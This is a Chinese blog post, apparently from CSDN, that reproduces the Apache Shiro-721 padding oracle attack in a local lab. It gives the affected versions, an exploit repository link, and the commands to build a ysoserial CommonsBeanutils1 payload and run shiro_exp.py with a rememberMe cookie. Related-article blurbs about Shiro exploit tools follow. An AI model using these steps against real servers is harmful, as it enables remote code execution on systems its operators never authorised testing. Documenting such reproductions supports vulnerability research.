Shiro Padding Oracle Attack

最新推荐文章于 2024-03-29 10:22:56 发布
最新推荐文章于 2024-03-29 10:22:56 发布
阅读量559 收藏
点赞数
分类专栏: java Web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/109289504
版权
安全 同时被 3 个专栏收录
264 篇文章 9 订阅
订阅专栏
Web
220 篇文章 7 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

影响版本(影响1.2.4之后):
1.2.5,
1.2.6,
1.3.0,
1.3.1,
1.3.2,
1.4.0-RC2,
1.4.0,
1.4.1

下载:
https://github.com/3ndz/Shiro-721

# 安装paddingoracle
python2 setup.py install

# 准备登陆成功之后的rememberMe的Cookie值
qMkdx0k1eAJ3Ds0BwAwhVUm9wJRQFyBCt8zOVkFsR2VHiFfaRynCFWACjNET0dMYe58QkWSoc3DUXpZji5AD4Pqmt/3b7+0QO8142fwnB7ejIiNgMay2Rf+OaNEqZrxmIL+6d5rO49yq8gPlJA74gkXvGgihnT0kU+3riDJmoZBGdVvSRTV/ugl1tViv3Pnpd+QtzOR9v/VAFfLMch/vE+PGhczOwXc6U08cqohaQd0oO60LaBPc4/N87SFL63D/YkZbxFeSUelDYlzc+mLhC8teQlse7rEDs6NE+lq1/0pK7vIawtQ1XjVjwtx+Bz58j0RAMUOnOE+A2tHrL3TC/azSauRhKlXdsNDyVDBffBww5mtrouwBuKtspDyaJIbnS1SoSWbSVNpSnJ/WBIRhuIiSCbzSBnnVwdEmzFtBKdJ5O+t9JWsE7BRENe8kS34g3LBuKADwx1uQTeUpE5KX8qF3E9hXupmOMKkjYQ66j81z1LudadJP5PCLdYXVWFYS

# 准备ysoserial生成的序列化数据文件
D:\repos\Java\jdk1.7.0_80\bin\java.exe -jar D:\repos\ysoserial\target\ysoserial-0.0.8-SNAPSHOT-all.jar CommonsBeanutils1 calc > CommonsBeanutils1_calc.ser

# 准备shiro的页面url
http://cqq.com:8088/samples_web_war/home.jsp 

# 开始攻击
"D:\Python27\python2.exe" shiro_exp.py http://cqq.com:8088/samples_web_war/home.jsp qMkdx0k1eAJ3Ds0BwAwhVUm9wJRQFyBCt8zOVkFsR2VHiFfaRynCFWACjNET0dMYe58QkWSoc3DUXpZji5AD4Pqmt/3b7+0QO8142fwnB7ejIiNgMay2Rf+OaNEqZrxmIL+6d5rO49yq8gPlJA74gkXvGgihnT0kU+3riDJmoZBGdVvSRTV/ugl1tViv3Pnpd+QtzOR9v/VAFfLMch/vE+PGhczOwXc6U08cqohaQd0oO60LaBPc4/N87SFL63D/YkZbxFeSUelDYlzc+mLhC8teQlse7rEDs6NE+lq1/0pK7vIawtQ1XjVjwtx+Bz58j0RAMUOnOE+A2tHrL3TC/azSauRhKlXdsNDyVDBffBww5mtrouwBuKtspDyaJIbnS1SoSWbSVNpSnJ/WBIRhuIiSCbzSBnnVwdEmzFtBKdJ5O+t9JWsE7BRENe8kS34g3LBuKADwx1uQTeUpE5KX8qF3E9hXupmOMKkjYQ66j81z1LudadJP5PCLdYXVWFYS D:\repos\ysoserial\CommonsBeanutils1_calc.ser

在这里插入图片描述
据说要几个小时。

据说是在对1.2.4的shiro-550的修复方式中引入的,然后在 Apache Shior(1.4.2)修复。

参考:

caiqiiqi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Padding Oracle Attack--代码实现及深入理解
Yale的博客
05-26 5063
Padding Oracle Attack 分组密码 在密码学中,分组加密(英语:Block cipher),又称分块加密或块密码,是一种对称密钥算法。它将明文分成多个等长的模块(block),使用确定的算法和 对称密钥对每组分别加密解密。 什么是PKCS#5? PKCS#5,就是一种由RSA信息安全公司设计的填充标准。 对于PKCS#5标准来说,一般缺少几位,就填充几位那个数字。 比方说,在上...
Padding Oracle Attack实例分析
buptisc_txy的专栏
11-24 1599
转自:http://blog.zhaojie.me/2010/10/padding-oracle-attack-in-detail.html,谢谢老赵! cookie在保证一段时间的有效登录时,估计会涉及padding oracle的漏洞。 老赵没有提到怎么防范这种类型的漏洞,我看1 不用cbc的加密方式。2 随机加密密钥。3  格式错误,比如padding错误,并不明显提示出来。
padding-oracle-attack_Padding Oracle Attack&CBC字节翻转攻击
weixin_39835991的博客
11-24 552
先来讲一讲CBC模式加密原理:加密过程:1.首先将明文(Plaintext)分组(常见的以16或8字节为一组),位数不足的使用特殊字符填充。2.生成一个随机的初始化向量(IV)和一个密钥。3.将IV和第一组明文异或(xor运算)。4.用密钥对3中xor后产生的密文加密。5.用4中产生的密文对第二组明文进行xor操作。6.用密钥对5中产生的密文加密。7.重复4-7,到最后一组明文。8.将I...
再不学点现代密码,CTF就Hold不住啦!
蚁景网安学院
01-04 1354
点击蓝字关注我们0x00 前记 在许多CTF中,crypto中DES,AES,RSA三种现代密码频繁出现,今天在此做一下分享,给大家带来几个有趣的题目分析。0x01 现代密码之DES...
shiroshiro反序列化漏洞综合利用工具v2.2(下载、安装、使用)
最新发布
yy1715713348的博客
03-29 1842
压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。客常用的开发软件都在这里了,给大家节省了很多时间。
Apache Shiro Padding Oracle漏洞可导致远程命令执行漏洞解决
01-09
背景:Apach Shiro官方披露其cookie持久化参数rememberMe加密算法存在漏洞,可被Padding Oracle攻击,攻击者利用Padding Oracle攻击手段可构造恶意的rememberMe值,绕过加密算法验证,执行java反序列化操作,最终可...
shiro_attack-2.2.jar
12-17
shiro_attack-2.2.jar
shiro-attack-4.7.0-SNAPSHOT-all.zip
10-24
标题提到的"shiro-attack-4.7.0-SNAPSHOT-all.zip"很可能是针对Apache Shiro的安全测试工具或者漏洞利用工具包,其主要目的是帮助开发者检测和防范Shiro框架相关的安全问题。 描述中的"序列化验证工具"可能是指该...
shiro_attack_2.2.zip
07-18
在"shiro_attack_2.2.zip"这个压缩包中,我们可以推测它可能包含了关于Apache Shiro的安全攻击分析或者防御策略,特别是针对其2.2版本的。下面我们将深入探讨Apache Shiro的基本概念、常见攻击以及如何防范这些攻击...
shiro反序列化attack
09-29
“本工具仅能在取得足够合法授权的企业安全建设中使用,在使用本工具过程中,您应确保自己所有行为符合当地的法律法规。 如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和所有...
shiro_attack_1.5.zip
03-22
shiro漏洞利用工具,最新版本
ShiroExploit.V2.3rce图形化利用.zip
06-25
ShiroExploit.V2.3 shiro远程命令执行 550 721 一键漏洞利用 rce 图形化利用.zip
Padding Oracle Attack(Java代码实现攻击)
hldfight
03-12 1068
之前看到过一个关于Apache Shiro的一个漏洞,它的Cookie使用AES-128-CBC模式进行加密,导致攻击者可以通过Padding Oracle攻击方式构造序列化数据进行反序列化攻击,这里可以复现该漏洞。但今天的主题不是Apache Shiro,这个以后会讲到。 今天主要讲下Padding Oracle攻击的原理,元旦放假一天,没事干,就自己用Java代码复现了下这...
Shiro漏洞检测
weixin_43554548的博客
05-10 9098
关于Shiro漏洞检测工具的使用说明Shiro-550反序列化漏洞简介漏洞检测工具工具一:ShiroExploit工具二:shiro_attack-2.2补充说明 Shiro-550反序列化漏洞简介 漏洞简介: Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户
浅析Shiro Padding Oracle Attack
蚁景网安学院
12-03 483
前言Shiro这个词最近在安全圈挺火的,我是第一次接触到这个,所以Apache发漏洞通告的时候还是给我整的有点懵。在看师傅们的复现时也感到有点吃力,因此整理了下关于这个漏洞的相关知识点,...
oracle攻击的几种方式,padding oracle攻击思路总结
weixin_39842955的博客
04-07 2089
之前一直没有机会好好总结下padding oracle, 在LCTF 上水了两天,Simple Blog 这题就看了一天,最后还是没有弄出来, 参考了各位大师傅的wp, 赛后好好总结下这个漏洞, 还是很有意思的Padding Orlace攻击这是CBC模式下存在的攻击,与具体的加密算法无关(当然,必须是分组加密)。不过,实际上Padding Oracle不能算CBC模式的问题,它的根源在于应用程序...
shiro attack怎么用
10-10
Shiro Attack是一种网络安全工具,主要用于测试和评估网络系统的安全性。下面是关于如何使用Shiro Attack的简要说明: 首先,要使用Shiro Attack,你需要安装和配置Java环境,确保你的计算机满足运行要求。 接下来,你需要下载和安装Shiro Attack工具。你可以在Shiro Attack官方网站或GitHub上找到相关的下载链接。请确保你下载和安装最新版本的Shiro Attack以获取最新的功能和修复的漏洞。 一旦安装完成,你可以打开Shiro Attack工具并开始使用它。在主界面上,你可以看到各种选项和功能,如攻击类型、目标URL、Cookie配置等。 首先,你需要确定你想要进行的Shiro Attack类型。Shiro Attack工具提供了几种不同的攻击模式,如Padding Oracle、JRMP Gadgets、Sleep Attack等。你可以根据你的需求选择适合的攻击模式。 接下来,你需要指定目标URL。这是你想要测试和评估的网络系统的URL地址。确保你在URL输入框中输入准确的URL。 然后,你需要进行Cookie配置。有些Shiro Attack类型需要有效的Shiro会话Cookie来进行攻击。你可以通过添加Cookie头或使用Cookie文件来完成配置。 最后,你可以点击“开始”按钮开始执行Shiro Attack。在攻击过程中,你可以实时监视攻击进展和结果。完成后,你可以查看报告,了解攻击的成功率和漏洞信息。 需要注意的是,Shiro Attack是一种专业的安全工具,使用时应谨慎。除非你对网络安全有足够的了解和掌握,否则建议在合法和授权的环境中使用该工具,以避免非法和恶意活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值